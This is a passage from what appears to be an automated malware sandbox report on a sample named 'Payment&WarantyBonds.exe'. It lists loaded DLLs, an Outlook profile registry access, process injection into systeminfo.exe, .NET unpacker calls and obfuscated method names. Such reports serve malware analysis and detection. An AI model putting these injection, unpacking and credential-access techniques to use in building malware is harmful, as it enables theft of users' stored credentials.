                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lVlYtqLlYCJP.exe, 00000006.00000000.1945290809.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099378604.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Payment&WarantyBonds.exe.3650b90.1.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.50d0000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A4659 push edx; retf 0_2_007A465A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A46C1 push ebx; retf 0_2_007A46C2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A46BB push edx; retf 0_2_007A46BE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A46B9 push ebx; retf 0_2_007A46BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A4778 push esi; retf 0_2_007A477A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007A47AF push esi; retf 0_2_007A47B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007AAC60 pushfd ; retf 0_2_007AAC62
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007AAC58 pushfd ; retf 0_2_007AAC5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C004E8 push esp; ret 0_2_00C004E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040185B pushfd ; retf 2_2_0040187E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00426833 push edi; ret 2_2_0042683E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004148C0 push esp; retf 2_2_004148C1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004018BC pushad ; ret 2_2_004018D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004139BA pushfd ; ret 2_2_004139BB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041AA77 push edx; iretd 2_2_0041AA86
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00418304 push eax; ret 2_2_00418305
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417BD1 push esi; ret 2_2_00417BDA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040D3BF push edx; ret 2_2_0040D3DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00422562 push ss; retn 0000h2_2_0042256A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417E58 push ss; retf 2_2_00417E8D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041A6CB push edi; retf 2_2_0041A6DC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00401F0B pushfd ; retf 2_2_00401F0C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041771B push esi; ret 2_2_0041771D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041473C push edi; retf 2_2_0041473E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004117B1 push ss; iretd 2_2_004117C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D225F pushad ; ret 2_2_017D27F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D27FA pushad ; ret 2_2_017D27F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018009AD push ecx; mov dword ptr [esp], ecx2_2_018009B6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D283D push eax; iretd 2_2_017D2858
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017D1366 push eax; iretd 2_2_017D1369
                Source: Payment&WarantyBonds.exeStatic PE information: section name: .text entropy: 7.95788200827039
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
